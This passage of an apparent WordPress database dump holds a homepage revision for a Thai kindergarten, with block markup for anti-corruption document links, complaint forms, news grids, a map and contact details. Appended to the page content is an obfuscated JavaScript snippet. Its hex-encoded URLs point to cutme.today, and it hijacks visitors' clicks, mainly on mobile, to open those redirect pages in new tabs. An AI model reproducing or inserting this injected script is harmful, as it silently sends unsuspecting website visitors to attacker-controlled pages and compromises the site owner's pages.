900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-06-27 13:43:35','2025-06-27 06:43:35','',19,'http://watprato.ssk.in.th/?p=498',0,'revision','',0),
